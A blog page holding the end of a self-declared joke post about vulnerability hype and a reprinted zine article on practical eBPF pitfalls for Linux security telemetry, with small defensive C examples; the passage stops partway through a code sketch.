<h1 id="impact">Impact</h1>
<p>Since I didn’t read the source and didn’t actually verify any details, I have
no idea what the impact of this vulnerability is (I could’ve read the source
but honestly? it’s my day off and I don’t feel like it). But I’m not going to
let that stop me from speculating wildly.</p>
<p>Due to the severity and ease of use of the vulnerability, I’m going to call
this a CVSS 10.0/10.0 (for any version of CVSS your org is using). It is
recommended that you patch as soon as possible (note: there is currently no
patch available, but check out this neat kernel commit!
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7b58b82b86c8b65a2b57a4c6cb96a460654f9e09">7b58b82b86c8b65a2b57a4c6cb96a460654f9e09</a>,
isn’t Linux cool? Also, aren’t I really super cool for understanding that
commit? Fun, right? Kernel hacking!)</p>
<h1 id="is-my-org-impacted">Is my org impacted?</h1>
<p>It’s a Linux vulnerability, so yes. However, the course of action will not be
the same for all orgs. Certain orgs that can’t risk the downtime or have other
priorities (such as hospitals) should probably just ignore this (be scared
still though). Orgs that should most pay attention to this vulnerability are
security vendors, because FUD is great for business.</p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:bees" role="doc-endnote">
<p>This actually isn’t part of the joke, <a href="https://www.nrcs.usda.gov/wps/portal/nrcs/detail/national/plantsanimals/pollinate/?cid=stelprdb1263263">bees are awesome.</a> <a href="https://thebeeconservancy.org/10-ways-to-save-the-bees/">We really gotta save the bees.</a> <a href="#fnref:bees" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p>Friday Ortiz</p>
<p>TL;DR: Look at the publication date, I’m fucking with you.</p>
<p><strong>every Boring Problem Found in eBPF</strong></p>
<p>2022-02-22T04:00:00+00:00</p>
<p>https://ortiz.sh/ebpf/2022/02/22/EVERY-BORING-PROBLEM</p>
<p><strong>This article was originally written for tmp.0ut volume 2 and is available
here: <a href="https://tmpout.sh/2/4.html">https://tmpout.sh/2/4.html</a>. Due to the
unique (read: badass) format of the zine, it is replicated here as plaintext.</strong></p>
<h1 id="errata">Errata</h1>
<ul>
<li>In the section <code class="language-plaintext highlighter-rouge">Stable interfaces aren't</code>, “and on a kernel older than 4.17”
should read “and on a kernel newer than 4.16”</li>
</ul>
<h1 id="article">Article</h1>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** Looking up your article...
*** Found your article...
:~$ head alex.ascii
,,,... ...,........
.*//(((((((/(((((((((####((/*,.
.,*/(//(//(((#%%###(##%%%##(#%%%%%#####(*..
.***/((//((##/###(#%&&&&%%%&%%%&&%#%%%%&&&&%%%%#/,.
.,**/(/((##%#(((###%%%%%%&@@&&&&&&&&&&&&&@@&&&&&&&&&%(.
..*///#((#(((#%%%##%%%%&&&&&&@@@&&&&&&%%%&%&&&@@@@@@@&&%#*.
,*(/(((((((((###%%%%%%%&%%%&&%%%%%#%###((/////((##%&@@@@&&&%%(*.
.*/(/(##(########%#%%%%%%###%%####((((///**********//(((#&&@@@&&&%(,
.*/((##############(((////(/*******,,,,,*,,*,,,,*****/////((#%@@&&&%#(*.
,/(/(((####%#(((///**,,,,,,,,,,,,,,,,,,,,,*,,,,,*********//////((&@&&%%&%/.
,/((#((((##(((/**,,,,.....,,,,,,,,,,,,,,,,,,,,,,*************////(%&&%%%%%(.
,*/((##/(##(*...,........,,,,,,,,,,,,,,,,,,,,**,,,*************///(%&&%%%%%/.
.*(##(((((#%(,.. .. .......,,,,,,,,,,,,,,,,,,,,,,,,,***********////(#%&&%#%%%(,
,/(((//(##&#*,. ....,,,,,,,.,..,,,...,,,,,,**************/////(#%&%%%%%%%#*.
,(##(###%&%#*. .,*/(#%###((/*,,..,,,..,,*/((##%%%###%%####((////((#%%&%%##%%%#,
,(##(###&%&%#, ,////**,,,,*/(/////*,,,,,,,**/((##%%&%&&&&%%&&%&%#(///(%&&%%&%%%%%#*.
,(%%%#####(%(..*,,**/////*/////*/,**,.,,***/(* .*/(((#(((///*/((#%%#(((%@@%&&&&&%%#((/,
,(###((/. ,,,,///(/*....,///*//(/,.,,,/((.*((/(*,/(##/,,,*((**//((((((%@&&&&@@&%(,.
./((((((%,,,**** /*/##(/,/*.,,***/(.. ...,(*//(#(,.,,**(((**/(((%&@&@@@@&@%*.
./((##%&.,,*, . .//./(//,..**.,**/(*//*,*/(/(#((/,,,***//*,*((###%@@@@@@&&%*
,(##%&(.,,..,,,. . .,.. /.,,**//#(./*,,*,,,.,.,*********,////((&@@@@@@@&&#.
,(##%. ,. . . *. .,**/((*.****,,,,,........,,,,**////#&@@@@@&&&(,
.*/* ............... .. ....,**//((/,*/*****,,,,,,,,,**////////&@&&&&&%,
,. ........,,,.............,**//(//*/**,***,,,,,,,*//////////%&%#/*.
.. ..........,,,,,,*///**///****,***////***//*/*/////(%(*.
.. ........,.,*((#/**//##&#////*,,,,,,,*************///(#(*.
.. .......,,,,..,*/*,,,****/(((((/*,,,,,,,,,********/////(((/*,
... . .............,*(((/(//////(####//***,,,,*,,,,*****/////((#/,.
.,............,*///(##(///(///((((##%%#((///*,,,********////((##*.
,,,........*/(((#(/**,,,*,,,,,,*//#%%%%%%%##(/******////((((###*.
,.,,,,,.,.*(((((/**//(((/,,,/**/(/(((((#%%%%%%#(//*//((((((###.
.,,,,,.,,,(/****/#&#//***,,,,,*//*/(#%%##((((#%#(//(((((((((#(
.,,****,,,,,,,,,...,,..,,,,*******////((///**//(#(((((#((((##*
,**,***,,*,,,.........,,,,********///******///*/(((#((((####.
,****,,,,,***,,.....,*///(((((((((//****//(((/(((###(###%%/.
.****,,,*/((/*,,....,*//(#((//****/*///(######(((#(##%%&%(.
,*//**/((#((/*****//*//////////(#(##%%%%&%####%#&%&&%/,
*##########((**//////(/((/(/#(##%%&&%&&&&%&&&&&&&#,
,#%%&%%%###(((((((//((((((###%%%&&&&&@@&@@@&&&%(,
,/#%&%%%#(##(#(#((########%#%%&&@&@@@@&@&&%#*.
.*(%&&%%###(####%#%%###&%&&&@@@@@&&&&%%%#/,
.,*(%&&%%%%&%&&&&&&&&&@@@@@&&&&%&%(*.
.,*(##%%&%%%&%&&%%%%#((///*,.
.
~~[every Boring Problem Found in eBPF] by @FridayOrtiz~~
> /WHOIS @FridayOrtiz
*** @FridayOrtiz https://ortiz.sh/contact/
> /LIST
*** eBPF, BPF, Linux Kernel, guide, tips
+-#- Introduction -#-
|
| About six months ago I started a new job and dove into adding Berkeley Packet
| Filters (BPF) as a telemetry source for our Linux endpoint security agent. This
| work culminated in the release of three open source libraries ([0], [1], [2]).
| This isn't about that, though. This is about the issues we ran into while
| implementing BPF as defenders, and how defenders can use BPF in their
| environments (although attackers should find useful tips in here too). I went
| through every PR, Jira ticket, and message from the past six months to put
| together this list of BPF gotchas and their solutions. I hope it helps
| defenders, developers, and researchers ramp up with BPF faster than I did.
|
| Note: I'm going to use BPF to mean extended BPF (eBPF), since that's the
| official name. Not to be confused with the old classic BPF (cBPF). I'm also
| going to assume you're *loosely* familiar with BPF, enough to be considering
| whether or not to deploy it in your environment.
+-
+-#- Why even use BPF? -#-
|
| You may be wondering, "if you're filling an article with caveats about BPF, why
| should I even bother trying to use it?" Great question, straw man. There are a
| number of things BPF is really, really good at that you should consider.
|
| - **You can get visibility (almost) anywhere you want.** If there's a specific
| code path within the kernel (or userspace) that you know will be executed during
| an attack, you can put yourself there. If there's a payload value in a packet
| you need to see before it hits your `iptables` rules, you can do that. Want to
| modify or block syscall args? You can do that too.
|
| - **You can reinstrument dynamically.** Change your mind about what you want to
| inspect? Change it while it's running. You can either swap out the entire
| program (although that might not be possible in the future with signed BPF
| programs[4]) or modify behavior by updating BPF maps from userspace.
|
| - **It's safe!** You can do all these things with a Linux Kernel Module (LKM),
| sure, but the BPF Virtual Machine (BPF-VM) and verifier ensure (or at least
| try really hard to ensure[17]) that you can't panic or break the kernel.
|
| - **It's container aware, or at least it can be.** Instrumentation alternatives
| like `auditd` tend to struggle in containerized environments, returning values
| that only make sense in certain namespaces, or losing track of things entirely.
| BPF, on the other hand, can give you information in whatever context you want
| (as long as you program it that way).
|
| - **It's fast.** Do as much work as possible in the BPF program before sending
| information up to userspace, and you can avoid expensive context switching or
| race-prone data enrichment.
|
| - **It's atomic (sort of).** BPF programs generally aren't preemptable (there
| are exceptions[5]). This applies to tail calls as well, so you can set up some
| fairly complex logic in your instrumentation without worrying too much about
| reentrancy.
+-
+-#- The problem with BPF. -#-
|
| From this writer's perspective, there are two main problems with BPF: 1) it's
| now being used in ways it was never designed for (i.e., it's evolving naturally
| over time) and 2) there's a large overlap in maintainers of the Linux kernel's
| BPF subsystem and userspace BPF tooling.
|
| The following are concrete issues stemming from (1):
|
| - BPF isn't really CO-RE (Compile Once - Run Everywhere), it's more CE-RO
| (Compile Everywhere - Run Once). A lot of userspace tooling "achieves" CO-RE in
| practice by compiling on the host machine. New true CO-RE features are... new.
| Chances are you need to support a kernel that doesn't have them. End-of-life
| doesn't mean much when the host is running a business-critical function and the
| suits see too much risk in upgrading it. And loading a full toolchain to
| compile BPF programs on the host is often a no-go too.
|
| - The toolchains and libraries are designed around `bpftrace`-like use cases.
| That is, one-off tooling for diagnosing specific problems. Brendan Gregg's
| book[7] is a great resource for this. Now that BPF for long-running daemons is
| gaining popularity, the maintainers are working hard adding features to support
| this (like the aforementioned true CO-RE). Unfortunately, again, these features
| probably won't exist on the kernels you need to support.
|
| - There are many different types of BPF programs (which we'll cover), that all
| have varying load and run semantics. Depending on whether you want to run a
| kprobe or a TC classifier, you'll have to use entirely different methods to do
| so. And while you're writing them, the helpers available to you can vary
| wildly. And the documentation is incomplete, scattered, and often out of date,
| because...
|
|
| And here are some specific examples of issues stemming from (2):
|
| - Because of the overlap, documentation of the pure BPF interface(s) (there's a
| plethora, we'll cover that) is lacking. The people that maintain it write the
| userspace tooling, so they don't need in-depth documentation. Seriously, go
| check out the BPF manpage for whatever distro you're on. Chances are it's
| missing a ton of helpers and there's more than one "TODO: fill this out" that's
| been sitting there for years. Why not use their userspace tooling? Well...
|
| - Their userspace tooling is a magic labyrinth. In order to get close to CO-RE in
| a backwards compatible way, it's filled with kludges you probably don't need.
| Ideally, you'd interface directly with the underlying syscalls and use only
| what you need. But doing that is undocumented. And, because of the
| documentation issues, there's really no community drive to simplify these
| libraries. Because these libraries cover (until recently, see (1)) the majority
| of historical use cases, there's no drive to improve the documentation. Even if
| you did, you'd have to backport and patch your documentation to cover all the
| little idiosyncrasies across kernel versions, and boy are there a lot of those.
+-
+-#- Implementation Issues -#-
|
| While working with BPF we ran into a number of implementation-specific problems
| that led to us building and publishing those three ([0], [1], [2]) BPF tools.
| If you're a defender, or work in security, and you're considering getting
| started with BPF, here's a list of things you'll probably want to know,
| presented in somewhat logical order.
|
| +-**- The verifier sucks, but the alternatives are worse. -**-
| |
| | -...- Problem -...-
| |
| | You will run into lots of problems with the verifier. For example, what's the
| | difference in the following two code snippets?
| |
| | ```c
| | u32 *p = 1;
| | u32 i = *p;
| | ```
| |
| | ```c
| | u32 *p = 1;
| | u32 i = 0;
| | __builtin_memcpy(&i, p, sizeof(u32));
| | ```
| |
| | I'll tell you: the first one fails the verifier, the second one does not. But
| | only sometimes, except when it works. Which depends on the kernel version.
| | Maybe. I mean, they should compile to the same thing, right? Apparently not,
| | and subtle differences can completely throw the verifier off.
| |
| | The real problem with the verifier is that it's getting better all the time. As
| | BPF use cases settle out, the maintainers are changing the BPF verifier to
| | better support them. That means on older kernel versions, without these
| | patches, you'll have to perform strange workarounds to get your code working
| | with older verifiers.
| |
| | A few more verifier problems you'll likely encounter supporting a wide range of
| | kernel versions:
| |
| | - The verifier hates looping. But, sometimes, it also hates loop unrolling. If
| | `clang` generates enough jumps and gotos, even if you tell it to unroll
| | everything, the verifier might (depending on version) fail it anyway. The
| | verifier needs to be able to keep track of all branches and ensure a maximum
| | depth limit. If it can't (whether it's because you're looping or because the
| | verifier can't keep up) your program will fail to verify.
| |
| | - In older kernel versions (but not newer ones) variable reads and writes are a
| | big no-no. All offsets must be known at compile time. That means you can't do
| | things like set `some_array[variable_index] = some_value`. This, plus the
| | aversion to loops, makes it nearly impossible to read strings from memory on
| | kernels without the `read_str` family of helpers. The kernel's own `qstr`
| | involves variable memory access—and good luck finding (or setting) the null
| | terminator on your own.
| |
| | - Everything that might be a pointer must be null checked. If you don't, the
| | verifier will refuse to load your program even if it's safe. This makes it hard
| | to work with programs that might expect a null value. The convention that most
| | pleases the verifier is to return immediately after a failed null check, and
| | getting around this is tricky and involves trial and error.
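| |
| | As a rough illustration of the last two bullets, here is a plain C sketch of
| | the shape older verifiers tend to accept: a loop with a compile-time bound,
| | indexes masked into range, and an early return on a failed null check. It is
| | written to compile in userspace, so it dereferences `src` directly where a
| | real BPF program would go through a probe-read helper. `MAX_STR` and
| | `copy_bounded` are hypothetical names, and whether a given verifier accepts
| | the equivalent BPF code still depends on the kernel.
| |
| | ```c
| | #include <stddef.h>
| |
| | #define MAX_STR 64 /* hypothetical bound; power of two so masking works */
| |
| | /* Copy at most MAX_STR - 1 bytes from src and always null terminate dst.
| |  * dst must hold MAX_STR bytes. Returns the bytes copied, or -1 on a
| |  * null pointer. */
| | static int copy_bounded(char *dst, const char *src)
| | {
| |     /* return immediately after a failed null check */
| |     if (!dst || !src)
| |         return -1;
| |
| |     int n = 0;
| |     /* the trip count is a constant, so the loop can be fully unrolled */
| |     for (int i = 0; i < MAX_STR - 1; i++) {
| |         /* masking keeps every index provably inside the buffer */
| |         char c = src[i & (MAX_STR - 1)];
| |         if (c == '\0')
| |             break;
| |         dst[i & (MAX_STR - 1)] = c;
| |         n++;
| |     }
| |     dst[n & (MAX_STR - 1)] = '\0';
| |     return n;
| | }
| | ```
| |
| | Calling `copy_bounded(buf, "hello")` with a `MAX_STR`-byte `buf` copies five
| | bytes; longer inputs are truncated to `MAX_STR - 1` bytes.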
| |
| | There are alternatives to the kernel verifier, such as PREVAIL[8], but they
| | have their own set of issues. For what it's worth, PREVAIL is an impressive
| | project and Microsoft will be basing their Windows BPF verifier off of it. But,
| | unfortunately, it doesn't match the expected behavior of the kernel verifier. Just
| | because something passes PREVAIL doesn't mean it will pass the kernel verifier.
| | Just because something fails PREVAIL doesn't mean it will fail the kernel
| | verifier (even though it probably should).
| |
| | -...- Solution -...-
| |
| | **Run early, run often, run everywhere.** Your development environment should
| | make it as easy as possible to test your code on all the kernels you need to
| | support (or as close to a representative sample as you can get). The only way
| | to know if the kernel verifier will accept your program is to run it through
| | the kernel verifier, the real kernel verifier, on the specific kernel you're
| | targeting. Note that this means the distro-specific kernel, with all their
| | modifications and backports. For example, the older Enterprise Linux (Red Hat,
| | CentOS, and so on) kernels (2.x and 3.x) have backported BPF features that
| | might surprise you, since they don't line up with mainline kernel version
| | numbers. The only way to know what's supported is to try it.
| |
| | **Enable logging.** This one comes with a caveat. You need to provide the
| | verifier with a large buffer of memory to write its verification logs into. If
| | you don't give it enough space it will fail verification, even if the program
| | would otherwise pass. If your programs are complex, then make sure your buffer
| | is large enough (but not too large, or loading will take forever) and be sure
| | to turn off verifier logs in production to avoid issues with programs failing
| | to load when you know they should.
| |
| | **The error messages you get will seem cryptic at first.** The BPF verifier
| | uses a lot of terminology and has a lot of restrictions that are undocumented
| | (of course) that you'll learn with time. If you get stuck, the BPF Compiler
| | Collection (BCC) GitHub repo's issue tracker[9] is a great resource. You can
| | probably find a Brendan Gregg ticket that goes over at least the broad class of
| | error you're getting.
| +-
|
| +-**- BPF doesn't really exist. -**-
| |
| | -...- Problem -...-
| |
| | BPF is really just an instruction set, for which the Linux kernel provides a
| | VM, verifier, and some helper functions. You run your programs inside this
| | execution context, and call the helper functions to extend the VM's
| | capabilities. When you write a BPF program, what you're really writing is a
| | kprobe, or a uprobe, or an eXpress Data Path (XDP) classifier, or a Traffic
| | Control (TC) classifier, or one of the many other types of kernelspace programs
| | that have been offloaded to the BPF subsystem. There's a ton of BPF program
| | types and more are being added all the time, for a variety of use cases. It
| | turns out being able to safely execute code in the kernel enables a ton of
| | interesting and helpful functionality. Unfortunately, every program type has
| | its own way to load, run, and clean up after it, most of which is entirely
| | undocumented.
| |
| | On certain distros, the tools you'll need to load these programs might not be
| | enabled by default. For example, some distros don't automatically mount
| | `debugfs`, which you'll need to load kprobes on older kernels.
| |
| | When you do figure out how to load your program, the ABI for defining programs
| | is entirely based on undocumented, implicit convention. For example, you'll
| | see a lot of `SEC("kprobe/my_kprobe")` to tell the loader that you're loading a
| | kprobe.
| |
| | ```c
| | /* helper macro to place programs, maps, license in
| |  * different sections in elf_bpf file. Section names
| |  * are interpreted by elf_bpf loader
| |  */
| | #define SEC(NAME) __attribute__((section(NAME), used))
| | ```
| |
| | This is actually entirely unnecessary, on the syscall level, and is merely a
| | common convention. As you can see in the above snippet, it's just a macro to
| | set the section name in the compiled ELF executable. There's nothing
| | BPF-specific about it. So you not only have to know the requirements of the
| | program type you're trying to load, but also the conventions used by the tools
| | that load and run it.
| |
| | -...- Solution -...-
| |
| | Figure out what you want your program to do first. Do you want visibility into
| | the kernel? Then you'll probably want a kprobe or tracepoint. Do you want to
| | drop inbound packets? You probably want XDP. Do you want to build detections on
| | outbound traffic? You might want TC, or you might want a kprobe in the kernel
| | network stack. Figure this out, then figure out what you're going to need to
| | run it the way you want to run it (one off? daemon?). When we made `oxidebpf`
| | we had to optimize for stability in the features we needed most (e.g., kprobes)
| | over coverage of all the different BPF program types.
| |
| | If you can't find libraries to suit your needs for your chosen program type,
| | you'll probably have to write it yourself (or contribute it to an open source
| | project). Because everything is poorly documented, you'll have to dig through a
| | lot of source code to put together the real set of necessary functionality. The
| | official-ish libraries like libbpf and libbcc tend to work the best, but
| | there are issues there (that we'll get to).
| |
| | I highly recommend using `bpftool` for debugging while developing. It provides
| | the easiest-to-use view into what programs and maps are loaded and where. It
| | lets you visualize data in maps, dump programs, and more. The only problem with
| | `bpftool` is that it's never in the same package. Some distros and repos let
| | you install it with a `yum install bpftool`. Others require you to
| | `apt-get install linux-oem-tools`. Sometimes you need to
| | `apt-get install linux-oem-tools-$(uname -r)`. It depends. Whatever you're
| | running, though, you'll probably want this tool installed.
| +-
|
| +-**- I hope you find constraints fun. -**-
| |
| | -...- Problem -...-
| |
| | Are you one of the dozen or so people unreasonably upset that `0x10c`[10] was
| | never released? Me too! I find working within constraints challenging and
| | enjoyable. And let me tell you, BPF programs have a lot of constraints.
| |
| | You get 512 bytes of stack space for your program, half a kilobyte. This
| | doesn't appear to be something that has changed or ever will. It's also unclear
| | if this applies to tail calls. Some documentation implies that tail calls use
| | the same stack space, so you're limited to 512 bytes total, but in practice it
| | seems to be 512 bytes per program. And `clang` probably won't be able to help
| | you. BPF programs, for whatever reason, don't like to reclaim stack space. Your
| | variables will get hoisted and instantiated at the start of execution. If you
| | want to do things like dump syscall arguments or `pt_regs`, especially when
| | working with strings, you'll find yourself running out of stack space very
| | quickly.
| |
| | There's a practical instruction limit of about 4096 instructions. The
| | instruction limit in the past was set (as far as I can tell) based on what the
| | verifier could verify before declaring "this has gone on too long, I can't
| | verify this won't halt, so I'm failing it." You can get more instructions by
| | manipulating the verifier, and doing other tricks you'll find in the mailing
| | lists, if you really want to put in the effort. Newer verifiers let you get
| | upwards of 1,000,000 instructions, but that'll only help you if you're
| | supporting newer kernels.
| |
| | -...- Solution -...-
| |
| | To work around the instruction limit, you can use tail calls. Tail calls are
| | the closest BPF has to a true function call. You transfer flow over to
| | whichever program you call into. You can chain tail calls like this together up
| | to 33 times. There are some caveats, which we'll get to later.
| |
| | There are a few tricks you can use to work around the stack limit. One trick is
| | to explicitly reuse stack space. For example, reusing variables or
| | instantiating a struct of bytes to act as your scratch space and manually
| | reusing offsets within it. Another trick is to build your own stack with maps.
| | On some kernel versions you can request a struct from a map and get a pointer
| | to it. If the requested struct doesn't exist (e.g., the array map at the
| | requested index was empty) you'll still get back a pointer to an empty struct
| | that you can manipulate. Other kernel versions require this map-struct to be
| | copied to the stack before being modified, so your mileage may vary.
| |
| | With all that said, I want to offer some practical advice. If the information
| | you're retrieving is too big to ever fit on the stack, you should just send it
| | out as you read it. Create a messaging type and pipeline for chunking and
| | rebuilding data in userspace, copy as much as you can to the stack, and then
| | send it up through a map. This will run on a wider range of kernel versions,
| | and you won't have to worry about whether your host kernel allows directly
| | manipulating and emitting map memory. You can reconstruct it in userspace at
| | will. This is what companies like Google are doing for their BPF telemetry.
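| |
| | A minimal sketch of that chunk-and-rebuild idea, in plain userspace C so it
| | can be compiled and tested anywhere. The `struct chunk` wire format and the
| | `make_chunk`/`place_chunk` names are hypothetical, not what any particular
| | vendor ships; in a real deployment the producer half would live in the BPF
| | program and emit each chunk through a map.
| |
| | ```c
| | #include <stdint.h>
| | #include <string.h>
| |
| | #define CHUNK_DATA 64 /* payload bytes per message, small enough for the stack */
| |
| | /* Hypothetical wire format for one chunk of a larger record. */
| | struct chunk {
| |     uint32_t record_id; /* which record this chunk belongs to */
| |     uint16_t seq;       /* position of this chunk within the record */
| |     uint16_t total;     /* number of chunks in the record */
| |     uint16_t len;       /* valid bytes in data[] */
| |     uint8_t data[CHUNK_DATA];
| | };
| |
| | /* Producer side: fill chunk number `seq` from `src`.
| |  * Returns 0 on success, -1 on bad input or an out-of-range `seq`. */
| | static int make_chunk(struct chunk *out, uint32_t id, const uint8_t *src,
| |                       size_t src_len, uint16_t seq)
| | {
| |     size_t total = (src_len + CHUNK_DATA - 1) / CHUNK_DATA;
| |     if (!out || !src || total > 0xffff || seq >= total)
| |         return -1;
| |
| |     size_t off = (size_t)seq * CHUNK_DATA;
| |     size_t len = src_len - off < CHUNK_DATA ? src_len - off : CHUNK_DATA;
| |
| |     out->record_id = id;
| |     out->seq = seq;
| |     out->total = (uint16_t)total;
| |     out->len = (uint16_t)len;
| |     memcpy(out->data, src + off, len);
| |     return 0;
| | }
| |
| | /* Consumer side: copy one chunk into its slot in `dst`, in any order.
| |  * Returns the bytes written, or -1 if the chunk does not fit. */
| | static int place_chunk(uint8_t *dst, size_t dst_len, const struct chunk *c)
| | {
| |     if (!dst || !c || c->len > CHUNK_DATA)
| |         return -1;
| |
| |     size_t off = (size_t)c->seq * CHUNK_DATA;
| |     if (off + c->len > dst_len)
| |         return -1;
| |
| |     memcpy(dst + off, c->data, c->len);
| |     return c->len;
| | }
| | ```
| |
| | Because each chunk carries its own `seq` and `total`, the consumer can place
| | chunks as they arrive and knows when a record is complete, even if messages
| | for different records interleave.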
| +-
|
| +-**- The good stuff is GPL. -**-
| |
| | -...- Problem -...-
| |
| | All the useful helper functions (like `perf_event_output`[6]) are exported as
| | GPL-only. If you want your program to do anything useful, you're going to have
| | to license it under GPL. That makes it hard to make proprietary programs based
| | on BPF. If your program is only internal, and never distributed, you're fine.
| | But if you start distributing your programs (to customers, friends, wherever)
| | you need to publish it under GPL.
| |
| | -...- Solution -...-
| |
| | Short answer: Make the world a better place, release your BPF code and tools.
| |
| | Long answer: BPF is still a niche and complex discipline, so open sourcing your
| | tooling doesn't reduce competitive effectiveness for a business. From an
| | individual perspective, open sourcing your tooling gets your name out there and
| | makes you more valuable as an employee. From an employer perspective, the more
| | accessible BPF becomes the easier it will be to hire people to build and
| | maintain it. From the community perspective, we can all learn from each other
| | by working in the open. Perhaps you have an interesting use case that the
| | maintainers of other libraries would want to know about, or could offer advice
| | on. Everybody wins.
| +-
|
| +-**- By default, you get the default. -**-
| |
| | Alternatively, BPF is only good with containers if you tell it to be.
| |
| | -...- Problem -...-
| |
| | Be careful with the assumptions you make about the information you retrieve
| | from a BPF program. If you grab the retcode of a `fork` call, it's going to
| | give you the retcode of the `fork` call: the pid in the namespace of the
| | calling process. Maybe this is what you wanted, or maybe you really wanted the
| | pid of the child process un-namespaced. Maybe you ask the BPF program to gather
| | the pid (with the `get_current_pid_tgid` helper). You take the lower 32 bits,
| | corresponding to the pid, but nothing lines up. Well, you're executing in
| | kernelspace, which means the `pid` you probably want is actually the `tgid`
| | (the upper 32 bits), and what you got was a `tid`. Unless you wanted a `tid`,
| | in which case you should get the `pid`. The kernelspace understanding of a
| | `pid` is not the same as the userspace understanding of a `pid`. If you want to
| | identify a file, you probably want the inode number and device number; a file
| | descriptor won't be as useful.
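| |
| | For reference, the helper packs the kernel `tgid` into the upper 32 bits of
| | its return value and the kernel `pid` into the lower 32 bits. A small sketch
| | of the split, in plain C, with the fields named from the userspace point of
| | view (`struct task_ids` and `split_pid_tgid` are hypothetical names):
| |
| | ```c
| | #include <stdint.h>
| |
| | /* Userspace view of the ids packed into the helper's 64-bit value. */
| | struct task_ids {
| |     uint32_t pid; /* userspace PID: the kernel's tgid, upper 32 bits */
| |     uint32_t tid; /* userspace TID: the kernel's pid, lower 32 bits */
| | };
| |
| | static struct task_ids split_pid_tgid(uint64_t pid_tgid)
| | {
| |     struct task_ids ids;
| |     ids.pid = (uint32_t)(pid_tgid >> 32);
| |     ids.tid = (uint32_t)(pid_tgid & 0xffffffffu);
| |     return ids;
| | }
| | ```
| |
| | Note that both values are still relative to the root pid namespace, so they
| | won't match what a process inside a container sees.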
| |
| | -...- Solution -...-
| |
| | If you want your program to retrieve information, think about what information
| | you need to retrieve. Make sure you know where that information exists (what
| | structs, where they live in memory, and how to get there) and then find a place
| | (assuming you're launching a kprobe) in the kernel you can attach your program
| | as close to that information as possible. For example, if you really need the
| | root namespace pid of the child process of fork, you probably want to hook
| | somewhere in the path of the new child process so you can grab the `pid` from
| | the `task_struct`.
| |
| | Be aware that this location might change between kernel versions, or the
| | information may take a different form. You may have to choose a less optimal
| | probe point that is available on more systems. Or you may have to change the
| | information you're gathering to something else that exists on all the kernels
| | you support. That leads us to the next two issues.
| +-
|
| +-**- CO-RE (probably) won't help you. -**-
| |
| | -...- Problem -...-
| |
| | The maintainers are constantly adding features to help BPF developers compile
| | their BPF programs once and run them everywhere. Unfortunately, you'll likely
| | find yourself trying to target kernel versions that don't have these features.
| | Or, if your kernel does have them, it may not have all the CO-RE features you
| | expect, since they are added piecemeal.
| |
| | For example, the BTF feature makes it possible to reference struct members
| | directly, even if they've been compiled in a randomized layout, across
| | different kernel versions, and without recompiling. This feature was added in
| | April of 2018[11]. You will probably need to write code for kernels from before
| | April 2018. This means something like `current->real_parent->pid` is not
| | guaranteed to work without recompiling for (or on) the host.
| |
| | -...- Solution -...-
| |
| | There's really no way around this one: you have to supply the struct offsets
| | yourself. It's what we're doing, Microsoft is doing it too for their Linux
| | machines, and I'm sure there are others. First, you determine the offsets of
| | struct members for your desired kernel version, and then you load them
| | dynamically into your BPF program at runtime. For example,
| | this code snippet from [12] shows how we read struct offsets from a map and use
| | that in our `bpf_probe_read` to retrieve values.
| |
| | ```c
| | static __always_inline int read_value(
| |     void *base, u64 offset, void *dest, size_t dest_size
| | )
| | {
| |     /* null check the base pointer first */
| |     if (!base)
| |         return -1;
| |
| |     u64 _offset = (u64)bpf_map_lookup_elem(&offsets, &offset);
| |     if (_offset)
| |     {
| |         return bpf_probe_read(dest, dest_size, base + *(u32 *)_offset);
| |     }
| |     return -1;
| | }
| | ```
| |
| | To actually find these offset values in the first place, we built the
| | `linux-kernel-component-cloud-builder`, or `LKCCB`, which builds hundreds if
| | not thousands of kernel modules with debug enabled for all our target kernel
| | versions and extracts structure offset information from the LKM's `DWARF` debug
| | info[1].
| +-
|
| +-**- Stable interfaces aren't. -**-
| |
| | -...- Problem -...-
| |
| | You'll often find, when working with the kernel, that there aren't as many
| | stable interfaces as you thought there'd be. Even syscalls, which are supposed
| | to be a big part of the stable user interface, aren't necessarily stable.
| |
| | For example, if you somehow traveled back in time and wanted to monitor process
| | forks, you'd probe the `fork` syscall. That'd work fine for a bit, until
| | `clone` is introduced. If you stopped paying attention, you'd lose your data
| | altogether when glibc (and everything with it) switched `fork()` to be a
| | wrapper around `clone()`.
| |
| | Maybe you want to get the arguments of a syscall. Should be easy, you're given
| | `pt_regs`, just access the registers that hold the arguments! Except if you're
| | on x86_64, and on kernel 4.17 or newer, you'll probably be given the
| | `pt_regs` of the syscall wrapper function, which in turn calls the real syscall
| | function. And of course, it all shuffles around if you need to add aarch64
| | support, which has its own set of calling conventions.
| |
| | Sometimes a symbol that's marked as being exported can't be attached to, almost
| | inexplicably. Usually this is due to GCC inlining the function, and the symbol
| | being renamed to something like `symbol_name.part.1213`. Trying to bind
| | `symbol_name` won't work.
| |
| | -...- Solution -...-
| |
| | For different architectures you can probably get away with macros that
| | conditionally compile depending on what architecture you're targeting, and then
| | building one copy per architecture. For the syscall wrappers, you can do
| | something similar but build targeting different kernel versions. In practice,
| | you may find you need many variants and copies of a single program, all with
| | slight differences, to support different kernels and architectures.
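| |
| | The macro approach might look roughly like the sketch below. To keep it
| | compilable in userspace it uses mock register structs instead of the
| | kernel's `pt_regs`, and it follows the wrapper's pointer directly where a
| | real BPF program would need a probe-read helper. `TARGET_AARCH64`, `ARG0`,
| | `mock_regs_t`, and `syscall_arg0` are all hypothetical names.
| |
| | ```c
| | #include <stddef.h>
| | #include <stdint.h>
| |
| | /* Mock register files with only the fields this sketch needs. The real
| |  * layouts come from each architecture's kernel headers. */
| | struct mock_regs_x86_64 { uint64_t di, si, dx; };
| | struct mock_regs_aarch64 { uint64_t regs[31]; };
| |
| | /* Pick the first-argument register once, at compile time. */
| | #if defined(TARGET_AARCH64)
| | typedef struct mock_regs_aarch64 mock_regs_t;
| | #define ARG0(r) ((r)->regs[0])
| | #else /* default build targets x86_64 */
| | typedef struct mock_regs_x86_64 mock_regs_t;
| | #define ARG0(r) ((r)->di)
| | #endif
| |
| | /* With a syscall wrapper, the probed function's first argument is a
| |  * pointer to the register file holding the real syscall arguments.
| |  * Returns 0 if any pointer along the way is null. */
| | static uint64_t syscall_arg0(const mock_regs_t *ctx, int has_wrapper)
| | {
| |     if (!ctx)
| |         return 0;
| |
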